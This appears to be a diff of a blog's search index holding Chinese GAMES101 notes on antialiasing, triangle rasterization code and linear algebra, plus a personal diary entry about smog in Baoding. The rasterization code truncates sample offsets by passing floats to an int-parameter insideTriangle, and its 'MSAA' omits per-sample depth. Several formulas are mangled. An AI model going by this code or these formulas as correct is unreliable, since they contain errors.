    Antialiasing By Supersampling (MSAA) 通过超级采样消除混叠(MSAA)

    Supersampling 超采样
    Approximate the effect of the 1-pixel box filter by sampling multiple locations within a pixel and averaging their values:

    通过对一个像素内的多个位置进行采样并对其值取平均值来近似 1 像素盒滤波器的效果:

    png

    • Take $N\times N$ samples in each pixel.

      在每个像素中取 $N\times N$ 个样本。

    • Average the $N\times N$ samples “inside” each pixel.

      平均每个像素“内部”的 $N\times N$ 个样本。

    • This is the corresponding signal emitted by the display

      最终结果如下:

    png

    Antialiasing Today 现在消除混叠的方法
    No free lunch!

    • What’s the cost of MSAA?

      MSAA的代价是什么?更高的计算量

    Milestones (personal idea)

    • FXAA (Fast Ap proximate AA)

      基于图像后处理的抗锯齿算法

    • TAA (Temporal AA)

      基于时序的抗锯齿算法

    Super resolution / super sampling 超分辨率/超采样

    • From low resolution to high resolution

      从低分辨率到高分辨率

    • Essentially still “not enough samples” problem

      本质上仍然存在“样本不足”的问题

    • DLSS (Deep Learning Super Sampling)

      DLSS(深度学习超级采样)

    HW2

    在上次作业中,虽然我们在屏幕上画出一个线框三角形,但这看起来并不是那么的有趣。所以这一次我们继续推进一步——在屏幕上画出一个实心三角形,换言之,栅格化一个三角形。上一次作业中,在视口变化之后,我们调用了函数rasterize_wireframe(const Triangle& t)。但这一次,你需要自己填写并调用函数 rasterize_triangle(const Triangle& t)
    该函数的内部工作流程如下:

    1. 创建三角形的 2 维 bounding box。

    2. 遍历此 bounding box 内的所有像素(使用其整数索引)。然后,使用像素中心的屏幕空间坐标来检查中心点是否在三角形内。

    3. 如果在内部,则将其位置处的插值深度值 (interpolated depth value) 与深度缓冲区 (depth buffer) 中的相应值进行比较。

    4. 如果当前点更靠近相机,请设置像素颜色并更新深度缓冲区 (depth buffer)。
      你需要修改的函数如下:

    rasterize_triangle(): 执行三角形栅格化算法
    static bool insideTriangle(): 测试点是否在三角形内。你可以修改此函数的定义,这意味着,你可以按照自己的方式更新返回类型或函数参数。
    因为我们只知道三角形三个顶点处的深度值,所以对于三角形内部的像素,我们需要用插值的方法得到其深度值。我们已经为你处理好了这一部分,因为有关这方面的内容尚未在课程中涉及。插值的深度值被储存在变量 z_interpolated 中。


    rasterize_triangle(): 执行三角形栅格化算法

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();
    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) //获取包围盒边界
    {
    if (point[0] < min_x) min_x = point[0];
    if (point[0] > max_x) max_x = point[0];
    if (point[1] < min_y) min_y = point[1];
    if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
    for (int y = min_y; y <= max_y; ++y)
    {
    if (insideTriangle(x + 0.5, y + 0.5, t.v))
    {
    auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    z_interpolated *= w_reciprocal;

    if (z_interpolated < depth_buf[get_index(x, y)])
    {
    depth_buf[get_index(x, y)] = z_interpolated;
    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
    set_pixel(point, t.getColor());
    }
    }
    }
    }
    }

    static bool insideTriangle(): 测试点是否在三角形内

    要使用向量的叉乘来判断一个点是否在三角形内部,可以按照以下步骤进行:

    1. 假设有一个三角形,其中包含三个顶点 A、B 和 C。
    2. 给定一个待检测的点 P。
    3. 使用向量 AB 和向量 AP 进行叉乘,并计算得到叉乘结果 cross1。
    4. 使用向量 BC 和向量 BP 进行叉乘,并计算得到叉乘结果 cross2。
    5. 使用向量 CA 和向量 CP 进行叉乘,并计算得到叉乘结果 cross3。
    6. 检查 cross1、cross2 和 cross3 的符号。如果它们都具有相同的符号(正数或负数),则点 P 在三角形的内部。否则,点 P 不在三角形的内部。

    具体来说,可以使用右手法则来确定向量的方向。对于跨越的两条边(例如 AB 和 AP),将右手的拇指指向第一条边(AB),食指指向第二条边(AP)。如果中指指向了背离三角形平面的方向,则叉乘结果为负数。如果中指指向了朝向三角形平面的方向,则叉乘结果为正数。

    这种方法基于向量的叉乘性质,通过检查叉乘结果的符号来判断点 P 是否在三角形内部。如果叉乘结果都具有相同的符号,那么点 P 在三角形的同一侧,即在三角形内部。如果叉乘结果具有不同的符号,那么点 P 在三角形的两侧,即不在三角形内部。

    请注意,这种方法只适用于点和三角形都位于同一平面上的情况。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    static bool insideTriangle(int x, int y, const Vector3f* _v)
    {
    // TODO : Implement this function to check if the point (x, y) is inside the triangle represented by _v[0], _v[1], _v[2]
    Eigen::Vector3f AP(x - _v[0][0], y - _v[0][1], 0);
    Eigen::Vector3f BP(x - _v[1][0], y - _v[1][1], 0);
    Eigen::Vector3f CP(x - _v[2][0], y - _v[2][1], 0);
    Eigen::Vector3f AB(_v[1][0] - _v[0][0], _v[1][1] - _v[0][1], 0);
    Eigen::Vector3f BC(_v[2][0] - _v[1][0], _v[2][1] - _v[1][1], 0);
    Eigen::Vector3f CA(_v[0][0] - _v[2][0], _v[0][1] - _v[2][1], 0);
    return AB.cross(AP).z() * BC.cross(BP).z() >= 0 && BC.cross(BP).z() * CA.cross(CP).z() >= 0;
    }

    $2\times2$ MSAA:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();

    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) //获取包围盒边界
    {
    if (point[0] < min_x) min_x = point[0];
    if (point[0] > max_x) max_x = point[0];
    if (point[1] < min_y) min_y = point[1];
    if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
    for (int y = min_y; y <= max_y; ++y)
    {
    float rate = 0.0f;
    if (insideTriangle(x + 0.25, y + 0.25, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.75, y + 0.75, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.75, y + 0.25, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.25, y + 0.75, t.v))
    rate += 0.25f;
    if (rate > 0.0f)
    {
    auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    z_interpolated *= w_reciprocal;

    if (z_interpolated < depth_buf[get_index(x, y)])
    {
    depth_buf[get_index(x, y)] = z_interpolated;
    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
    set_pixel(point, rate * t.getColor());
    }
    }
    }
    }
    }
    ]]>
    @@ -4258,7 +4258,7 @@ /posts/Diary-4-%E5%AF%92%E9%A3%8E%E4%B8%8E%E9%9B%BE%E9%9C%BE/ - 前言

    jpg

    梧桐与银杏

    ​ 近看银杏要比远看银杏更黄一些。

    ​ 这么看这 14 天里只有 3 天的天空比较正常……


    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [8, 10, 10, 4, 3, 7, 6, 5, 6, 9, 5, 5, 6, 7] # 当日最低温
    y2 = [23, 24, 24, 21, 18, 21, 22, 25, 24, 27, 22, 24, 21, 24] # 当日最高温
    y3 = [39, 63, 40, 43, 37, 66, 67, 109, 173, 187, 64, 68, 206, 175] # 当日 PM 值

    png

    ​ 这么近那么美,周末到河北。出门一脸灰,我不去河北。

    正文

    10.16

    jpg

    ​ 开始变黄的银杏树。

    ​ 脚贱去踩银杏玩,结果弄得整个鞋底都是臭烘烘的,喜提刷鞋,寄!

    10.20

    小迷糊冷不冷
    冷死我了
    昨天还穿短袖
    今天一早就寄

    ​ 大早上差点没冻傻,这个气温几乎是福州最冷的时候了。

    ​ 中午赶忙跑回去把秋衣手套围巾啥都整了。

    jpg

    ​ 北方的秋天来了。

    10.21

    jpg

    ​ 图书馆门口抱团取暖的鸭鸭。

    ​ 气温骤降随之而来的就是雾霾。雾霾把整张照片都弄得灰蒙蒙的,忍不住用 PS 调色了一下。

    10.22

    jpg

    ​ 舍友说想去钓鱼,于是陪他去钓鱼。

    ​ 骑车去了护城河那边发了两小时呆又回来了。

    10.23

    ​ 今天学校里臭烘烘的,上网查了下整个保定都臭哄哄的,不知道又在左线挠。污染真的太严重了啊啊啊啊啊啊啊

    10.24

    ​ 跟着教程把 Blender 入了个门,今天终于结束了教程。

    ​ 这段时间把科研搁置在了一边,去学了点本科专业相关的东西,却感觉到十分的自在。好怀念读本科的那个时候,觉得自己的专业课很有意义,我喜欢用计算机创造一些有趣的东西而不是炼丹写八股文。好想把论文水了去实习算了只要离开冀大就是胜利!

    ​ 想想毕业以后还是继续从事游戏行业?去追求自己所喜爱的,而不是父母所希望的那种较稳定轻松但是看着就无聊的工作主要是考不上也不想花太多精力去白给。要是干烦了再去考编也不迟,只要代码写得好转哪行都会吃香的。

    前一阵子刷一些招聘的
    看来看去还是开发岗位多
    咱们省内的
    拼一拼去北上广
    我父母不想让我加班 可我觉得编制又好无聊 不怎么感兴趣
    可以可以 我觉得干咱们这一行还得去北上广深这类地方
    当初我也是瞧不上编制
    现在求着编制收我
    太水的编制我觉得还不如追求自己喜爱的
    当时把伟哥挂投影仪上的时候我可开心了
    哈哈哈
    好的呢
    确实是有意义这个

    10.25

    感觉明天开组会,因为明天双选会
    真慢
    去年这时候我已经摸上伟哥了
    你不对劲

    ​ 新研一马上就要进组了,不再疫往情深,冀大效率居然比去年还慢!

    jpg

    ​ 偷跑去逛超市还能看到卖莆田枇杷的,买了一瓶尝尝。

    ​ 太甜了,根本就没有老家摘的那么难吃。

    jpg

    ​ 感觉是把植物园的招牌搬过来了。不!我不 ♥ BD!


    ​ 天气又转暖了,之前看的 11.4 下雪的天气预报也变卦了,血亏!

    10.26

    今晚七点在 326 开组会,和研一同学一起,大家记得准时到。

    ​ 组会就是新研一的见面会。我在自我介绍的时候还 balabala 了一大串,想做游戏啊想 PS 啊想三维建模啊想打羽毛球啊想下棋啊都可以来找我,笑死,感觉自己还蛮有特点的。

    ​ 看着新研一青涩的样子还真有点一年前自己的影子呢。可惜今年进来的都是一志愿的,全是北方人呜呜呜,而且都没有伟哥帅……

    ​ 导师说新研一要对自己读研要有目标,找工作啊读博啊甚至找对象都是目标。

    ​ 导师说课余时间要适当放松,注意身体,生活上有困难都可以跟导师说。去年刚毕业的师兄都腰椎间盘突出了,可怕。

    ​ 导师又说研究生更要懂得为人处世之道,但又要保持一定的单纯,总之要保持某种平衡吧。

    ​ 导师还说见到其他老师要打招呼,实验室的电力系统拉的一笔不要乱搞,怎么感觉又被内涵了……

    ​ 导师最后还让我们这些老同志说说对学习生活的体会:最牛逼的伟哥说研究生更要有自己学习的能力;实验受挫的杰杰说有时候努力并不一定有回报;我直接来了句“太痛苦啦”,引得师门都哄笑起来:326 里充满了快活的空气。

    10.27

    ​ 今天有两篇令我很震惊的新闻,感觉去年这个时候他们还经常出现的,世事无常啊……

    10.28

    jpg

    ​ 出去散步发现校门口外卖起了福鼎肉片,很想买一份尝尝,但是感觉雾霾天的路边摊不太卫生的感觉还是算了。而且感觉做肉片的人五大三粗,一看就很不福建,告辞!

    10.29

    jpg

    ​ 空气质量如图。

    ]]>
    + 前言

    jpg

    梧桐与银杏

    ​ 近看银杏要比远看银杏更黄一些。

    ​ 这么看这 14 天里只有 3 天的天空比较正常……


    ​ 保定气候播报:

    1
    2
    3
    4
    # y 轴数据(假设为温度和 PM 值)
    y1 = [8, 10, 10, 4, 3, 7, 6, 5, 6, 9, 5, 5, 6, 7] # 当日最低温
    y2 = [23, 24, 24, 21, 18, 21, 22, 25, 24, 27, 22, 24, 21, 24] # 当日最高温
    y3 = [39, 63, 40, 43, 37, 66, 67, 109, 173, 187, 64, 68, 206, 175] # 当日 PM 值

    png

    ​ 这么近那么美,周末到河北。出门一脸灰,我不去河北。

    正文

    10.16

    jpg

    ​ 开始变黄的银杏树。

    ​ 脚贱去踩银杏玩,结果弄得整个鞋底都是臭烘烘的,喜提刷鞋,寄!

    10.20

    小迷糊冷不冷
    冷死我了
    昨天还穿短袖
    今天一早就寄

    ​ 大早上差点没冻傻,这个气温几乎是福州最冷的时候了。

    ​ 中午赶忙跑回去把秋衣手套围巾啥都整了。

    jpg

    ​ 北方的秋天来了。

    10.21

    jpg

    ​ 图书馆门口抱团取暖的鸭鸭。

    ​ 气温骤降随之而来的就是雾霾。雾霾把整张照片都弄得灰蒙蒙的,忍不住用 PS 调色了一下。

    10.22

    jpg

    ​ 舍友说想去钓鱼,于是陪他去钓鱼。

    ​ 骑车去了护城河那边发了两小时呆又回来了。

    10.23

    ​ 今天学校里臭烘烘的,上网查了下整个保定都臭哄哄的,不知道又在左线挠。污染真的太严重了啊啊啊啊啊啊啊

    10.24

    ​ 跟着教程把 Blender 入了个门,今天终于结束了教程。

    ​ 这段时间把科研搁置在了一边,去学了点本科专业相关的东西,却感觉到十分的自在。好怀念读本科的那个时候,觉得自己的专业课很有意义,我喜欢用计算机创造一些有趣的东西而不是炼丹写八股文。好想把论文水了去实习算了只要离开冀大就是胜利!

    ​ 想想毕业以后还是继续从事游戏行业?去追求自己所喜爱的,而不是父母所希望的那种较稳定轻松但是看着就无聊的工作主要是考不上也不想花太多精力去白给。要是干烦了再去考编也不迟,只要代码写得好转哪行都会吃香的。

    前一阵子刷一些招聘的
    看来看去还是开发岗位多
    咱们省内的
    拼一拼去北上广
    我父母不想让我加班 可我觉得编制又好无聊 不怎么感兴趣
    可以可以 我觉得干咱们这一行还得去北上广深这类地方
    当初我也是瞧不上编制
    现在求着编制收我
    太水的编制我觉得还不如追求自己喜爱的
    当时把伟哥挂投影仪上的时候我可开心了
    哈哈哈
    好的呢
    确实是有意义这个

    10.25

    感觉明天开组会,因为明天双选会
    真慢
    去年这时候我已经摸上伟哥了
    你不对劲

    ​ 新研一马上就要进组了,不再疫往情深,冀大效率居然比去年还慢!

    jpg

    ​ 偷跑去逛超市还能看到卖莆田枇杷的,买了一瓶尝尝。

    ​ 太甜了,根本就没有老家摘的那么难吃。

    jpg

    ​ 感觉是把植物园的招牌搬过来了。不!我不 ♥ BD!


    ​ 天气又转暖了,之前看的 11.4 下雪的天气预报也变卦了,血亏!

    10.26

    今晚七点在 326 开组会,和研一同学一起,大家记得准时到。

    ​ 组会就是新研一的见面会。我在自我介绍的时候还 balabala 了一大串,想做游戏啊想 PS 啊想三维建模啊想打羽毛球啊想下棋啊都可以来找我,笑死,感觉自己还蛮有特点的。

    ​ 看着新研一青涩的样子还真有点一年前自己的影子呢。可惜今年进来的都是一志愿的,全是北方人呜呜呜,而且都没有伟哥帅……

    ​ 导师说新研一要对自己读研要有目标,找工作啊读博啊甚至找对象都是目标。

    ​ 导师说课余时间要适当放松,注意身体,生活上有困难都可以跟导师说。去年刚毕业的师兄都腰椎间盘突出了,可怕。

    ​ 导师又说研究生更要懂得为人处世之道,但又要保持一定的单纯,总之要保持某种平衡吧。

    ​ 导师还说见到其他老师要打招呼,实验室的电力系统拉的一笔不要乱搞,怎么感觉又被内涵了……

    ​ 导师最后还让我们这些老同志说说对学习生活的体会:最牛逼的伟哥说研究生更要有自己学习的能力;实验受挫的杰杰说有时候努力并不一定有回报;我直接来了句“太痛苦啦”,引得师门都哄笑起来:326 里充满了快活的空气。

    10.27

    ​ 今天有两篇令我很震惊的新闻,感觉去年这个时候他们还经常出现的,世事无常啊……

    10.28

    jpg

    ​ 出去散步发现校门口外卖起了福鼎肉片,很想买一份尝尝,但是感觉雾霾天的路边摊不太卫生的感觉还是算了。而且感觉做肉片的人五大三粗,一看就很不福建,告辞!

    10.29

    jpg

    ​ 空气质量如图。

    ]]>
    @@ -4285,7 +4285,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%881%EF%BC%89/ - 资源

    课程

    Lecture 01 Overview of Computer Graphics

    What is Computer Graphics?图形学的应用:

    • Viedo Games 游戏

    • Movies 电影特效

    • Animations 动画

    • Design 设计

    • Visualization 可视化

    • Visual Reality 虚拟现实

    • Augmented Reality 增强现实

    • Digital Illustration 数字化描述

    • Simulation 模拟

    • Graphical User Interfaces, GUI 图形用户接口

    • Typography 字体


    Why study Computer Graphics?

    • Computer Graphics is AWESOME!

    Course Topics(mainly 4 parts)

    • Rasterization 光栅化

      • Project geometry primitives (3D triangles / polygons) onto the screen 将几何图元(三维三角形/多边形)投影到屏幕上
      • Break projected primitives into fragments (pixels) 将投影基元分解为片段(像素)
      • Gold standard in Video Games (Real-time Applications) 视频游戏(实时应用)的黄金标准
    • Curves and Meshes 曲线和模型

      • How to represent geometry in Computer Graphics 如何在计算机图形学中表示几何图形
    • Ray Tracing 光线追踪

      • Shoot rays from the camera though each pixel 通过每个像素从相机拍摄光线
        • Calculate intersection and shading 计算交点和着色
        • Continue to bounce the rays till they hit light sources 继续反射光线,直到光线碰到光源
        • Gold standard in Animations / Movies (Offline Applications) 动画/电影黄金标准(离线应用程序)
    • Animation / Simulation 动画 / 模拟

      • Key frame Animation 关键帧动画
      • Mass-spring System 质量弹簧系统

    计算机图形学、计算机视觉、数字图像处理的区别:

    png

    Lecture 02 Review of Linear Algebra

    A Swift and Brutal Introduction to Linear Algebra! 一份对线性代数的迅速直接的介绍!

    Graphics’ Dependencies 图形相关的依赖项

    • Basic mathematics 基础数学

      • Linear algebra, calculus, statistics 线性代数、微积分、统计学
    • Basic physics 基础物理学

      • Optics, Mechanics 光学、力学
    • Misc 杂项

      • Signal processing 信号处理

      • Numerical analysis 数值分析

    • And a bit of aesthetics 还有一点美学

    This Course

    • More dependent on Linear Algebra 更多依赖于线性代数
      • Vectors (dot products, cross products, …) 向量(点积、叉积等)
      • Matrices (matrix-matrix, matrix-vector mult., …) 矩阵(矩阵相乘、矩阵与向量相乘等)
    • For example,
      • A point is a vector? 一个点是一个向量吗?
      • An operation like translating or rotating objects can be matrix-vector multiplication 类似平移或旋转物体的操作可以通过矩阵与向量相乘实现

    Vectors

    • 通常被写作 $\vec{a}$ 或 $\boldsymbol{a}$

    • 向量的长度被写作 $\left|\left|\vec{a}\right|\right|$

    • 向量的归一化,方向不变,长度设为 1:$\hat{a}=\vec{a}/|\vec{a}|$

    Cartesian Coordinates 笛卡尔坐标系

    $$\mathbf{A}=\begin{pmatrix}x\y\end{pmatrix}$$

    $$\mathbf{A}^T=\left(x,y\right)$$

    $$||\mathbf{A}|=\sqrt{x2+y2}$$

    Dot (scalar) Product 向量点乘

    $$\vec{a}\cdot\vec{b}=|\vec{a}||\vec{b}|\cos\theta $$

    $$\begin{aligned}\cos\theta&=\frac{\vec a\cdot\vec b}{|\vec a||\vec b|}\end{aligned}$$

    对于 Unit Vectors 单位向量:

    $$\cos\theta=\hat{a}\cdot\hat{b}$$

    性质:

    交换律:$\vec{a}\cdot\vec{b}=\vec{b}\cdot\vec{a}$

    分配律:$\vec{a}\cdot(\vec{b}+\vec{c})=\vec{a}\cdot\vec{b}+\vec{a}\cdot\vec{c}$

    结合律:$(k\vec{a})\cdot\vec{b}=\vec{a}\cdot(k\vec{b})=k(\vec{a}\cdot\vec{b})$

    Dot Product in Cartesian Coordinates 笛卡尔坐标系下的向量点乘

    Component-wise multiplication, then adding up 分量逐个相乘,然后求和

    • In 2D

      • $\vec{a}\cdot\vec{b}=\begin{pmatrix}x_a\y_a\end{pmatrix}\cdot\begin{pmatrix}x_b\y_b\end{pmatrix}=x_ax_b+y_ay_b$
    • In 3D

      • $\vec a\cdot\vec b=\begin{pmatrix}x_a\y_a\z_a\end{pmatrix}\cdot\begin{pmatrix}x_b\y_b\z_b\end{pmatrix}=x_ax_b+y_ay_b+z_az_b$

    Dot Product in Graphics 向量点乘在图形学中的应用

    • Find angle between two vectors (e.g. cosine of angle between light source and surface) 寻找两个向量之间的夹角,例如光源和表面之间的夹角的余弦值。

    • Finding projection of one vector on another 找到一个向量在另一个向量上的投影。

      • $\vec{b}_{\perp}$:$\vec{b}$ 在 $\vec{a}$ 方向的投影。
        • $\vec{b}_{\perp}$ 必须与 $\vec{a}$ 或 $\hat{a}$ 平行。
          • $\vec{b}{\perp}=k\hat{a}, k=|\vec{b}\perp|=|\vec{b}|\cos\theta $
    • Measure how close two directions are 测量两个方向之间的接近程度

    • Decompose a vector 分解一个向量

    • Determine forward / backward 确定正向/反向

    Cross (vector) Product 矢量积

    png

    • Cross product is orthogonal to two initial vectors 叉乘结果与两个初始向量垂直
    • Direction determined by right-hand rule 方向由右手定则确定
    • Useful in constructing coordinate systems (later) 在构建坐标系时非常有用

    性质:

    对于右手坐标系:

    $$\vec{x}\times\vec{y}=+\vec{z}$$

    $$\vec{y}\times\vec{x}=-\vec{z}$$

    $$\vec{y}\times\vec{z}=+\vec{x}$$

    $$\vec{z}\times\vec{y}=-\vec{x}$$

    $$\vec{z}\times\vec{x}=+\vec{y}$$

    $$\vec{x}\times\vec{z}=-\vec{y}$$

    不满足交换律:$\vec{a}\times\vec{b}=-\vec{b}\times\vec{a}$

    跟自身叉乘为零向量:$\vec{a}\times\vec{a}=\vec{0}$

    满足分配律:

    $\vec{a}\times(\vec{b}+\vec{c})=\vec{a}\times\vec{b}+\vec{a}\times\vec{c}$

    $\vec{a}\times(k\vec{b})=k(\vec{a}\times\vec{b})$

    Cross Product: Cartesian Formula? 矢量积在笛卡尔坐标系中

    $$\vec{a}\times\vec{b}=\begin{pmatrix}y_az_b-y_bz_a\z_ax_b-x_az_b\x_ay_b-y_ax_b\end{pmatrix}$$

    $$\vec a\times\vec b=A^*b=\begin{pmatrix}0&-z_a&y_a\z_a&0&-x_a\-y_a&x_a&0\end{pmatrix}\begin{pmatrix}x_b\y_b\z_b\end{pmatrix}$$

    $A^*$ 是 $\vec{a}$ 的伴随矩阵(伴随矩阵 - 维基百科,自由的百科全书 (wikipedia.org)

    Cross Product in Graphics 矢量积在图形学中的应用

    • Determine left / right 判别左右
    • Determine inside / outside 判别内外

    Orthonormal Bases / Coordinate Frames 正交基 / 坐标系

    构建右手坐标系:

    $$|\vec{u}|=|\vec{v}|=|\vec{w}|=1$$

    $$\vec{u}\cdot\vec{v}=\vec{v}\cdot\vec{w}=\vec{u}\cdot\vec{w}=0$$

    $$\vec{w}=\vec{u}\times\vec{v}$$

    $$\vec p=(\vec p\cdot\vec u)\vec u+(\vec p\cdot\vec v)\vec v+(\vec p\cdot\vec w)\vec w$$

    Matrix 矩阵

    Matrix-Matrix Multiplication 矩阵乘法

    一般不满足交换律(一般不满足 $AB\ne BA$)

    满足结合律和分配律:

    • $(AB)C=A(BC)$
    • $A(B+C)=AB+AC$
    • $(A+B)C=AC+BC$

    $$(AB)T=BTA^T$$

    Identity Matrix 单位矩阵

    $$I_{3\times3}=\begin{pmatrix}1&0&0\0&1&0\0&0&1\end{pmatrix}$$

    $$AA{-1}=A{-1}A=I$$

    $$(AB){-1}=B{-1}A^{-1}$$

    Vector multiplication in Matrix form 向量与矩阵相乘

    • Dot product 点乘

    $$\vec{a}\cdot\vec{b}=\vec{a}^T\vec{b}$$

    $$=\begin{pmatrix}x_a&y_a&z_a\end{pmatrix}\begin{pmatrix}x_b\y_b\z_b\end{pmatrix}=\begin{pmatrix}x_ax_b+y_ay_b+z_az_b\end{pmatrix}$$

    • Cross product 叉乘

    $$\vec a\times\vec b=A^*b=\begin{pmatrix}0&-z_a&y_a\z_a&0&-x_a\-y_a&x_a&0\end{pmatrix}\begin{pmatrix}x_b\y_b\z_b\end{pmatrix}$$

    Lecture 03 Transformation

    2D Transform 二维变换

    Scale Transform 缩放

    等比缩放:

    $$x^{\prime}=sx$$

    $$y^{\prime}=sx$$

    用矩阵乘法表示:

    $$\left.\left[\begin{array}{c}x’\y’\end{array}\right.\right]=\left[\begin{array}{cc}s&0\0&s\end{array}\right]\left[\begin{array}{c}x\y\end{array}\right]$$

    Scale (Non-Uniform) 任意缩放

    $$\begin{bmatrix}x’\y’\end{bmatrix}=\begin{bmatrix}s_x&0\0&s_y\end{bmatrix}\begin{bmatrix}x\y\end{bmatrix}$$

    Reflection Matrix 镜像

    Horizontal reflection 水平镜像:

    $$x^{\prime}=-x$$

    $$y^{\prime}=y$$

    用矩阵乘法表示:

    $$\begin{bmatrix}x’\y’\end{bmatrix}=\begin{bmatrix}-1&0\0&1\end{bmatrix}\begin{bmatrix}x\y\end{bmatrix}$$

    Shear Matrix 斜切:

    png

    Hints:

    • Horizontal shift is $0$ at $y=0$
    • Horizontal shift is $a$ at $y=1$
    • Vertical shift is always $0$

    $$\begin{bmatrix}x’\y’\end{bmatrix}=\begin{bmatrix}1&a\0&1\end{bmatrix}\begin{bmatrix}x\y\end{bmatrix}$$

    Rotation Matrix 旋转

    $$\mathbf{R}_\theta=\begin{bmatrix}\cos\theta&-\sin\theta\\sin\theta&\cos\theta\end{bmatrix}$$

    旋转相反的角等于矩阵的逆,等于矩阵的转置:

    旋转矩阵是正交矩阵

    $$\mathbf{R}{-\theta}=\mathbf{R}\theta{-1}=\mathbf{R}_{\theta}T$$

    Linear Transforms = Matrices 线性变换 = 矩阵

    $$x^{\prime}=ax+by$$

    $$y^{\prime}=cx+dy$$

    $$\left.\left[\begin{array}{c}x’\y’\end{array}\right.\right]=\left[\begin{array}{cc}a&b\c&d\end{array}\right]\left[\begin{array}{c}x\y\end{array}\right]$$

    简写为:

    $$\mathbf{x}^{\prime}=\mathbf{M}\mathbf{x}$$

    Translation 平移

    $$x^{\prime}=x+t_x$$

    $$y^{\prime}=y+t_y$$

    Why Homogeneous Coordinates 为什么引入齐次坐标

    • Translation cannot be represented in matrix form 平移变换不能用矩阵来表示

    $$\begin{bmatrix}x’\y’\end{bmatrix}=\begin{bmatrix}a&b\c&d\end{bmatrix}\begin{bmatrix}x\y\end{bmatrix}+\begin{bmatrix}t_x\t_y\end{bmatrix}$$

    因此,平移变换不是线性变换!

    • But we don’t want translation to be a special case 但我们不希望平移变换成为特例

    • Is there a unified way to represent all transformations? (and what’s the cost?) 用统一的方式描述所有变换?(代价是什么?)

    Solution: Homogenous Coordinates 解决办法:齐次坐标

    Add a third coordinate (w-coordinate) 增加一个维度

    • 2D point = $(x, y, {\color{Red}1})^T$
    • 2D vector = $(x, y, {\color{Red}0})^T$

    Matrix representation of translations 用矩阵描述所有变换

    $$\begin{pmatrix}x’\y’\w’\end{pmatrix}=\begin{pmatrix}1&0&t_x\0&1&t_y\0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\y\1\end{pmatrix}=\begin{pmatrix}x+t_x\y+t_y\1\end{pmatrix}$$

    Valid operation if w-coordinate of result is 1 or 0 所增加维度的值不是 1 就是 0,这是因为:

    • vector + vector = vector
    • point – point = vector
    • point + vector = point
    • point + point = 它们的中点

    因此定义,在齐次坐标中:

    $$\begin{pmatrix}x\y\w\end{pmatrix}\text{ is the 2D point }\begin{pmatrix}x/w\y/w\1\end{pmatrix},w\neq0$$

    Affine Transformation 仿射变换

    Affine map = linear map + translation 仿射变换 = 线性变换 + 平移

    $$\begin{pmatrix}x{\prime}\y{\prime}\end{pmatrix}=\begin{pmatrix}a&b\c&d\end{pmatrix}\cdot\begin{pmatrix}x\y\end{pmatrix}+\begin{pmatrix}t_x\t_y\end{pmatrix}$$

    Using homogenous coordinates: 使用齐次坐标

    $$\begin{pmatrix}x’\y’\1\end{pmatrix}=\begin{pmatrix}a&b&t_x\c&d&t_y\0&0&1\end{pmatrix}\cdot\begin{pmatrix}x\y\1\end{pmatrix}$$

    2D Transformations 2D 变换

    Scale 缩放

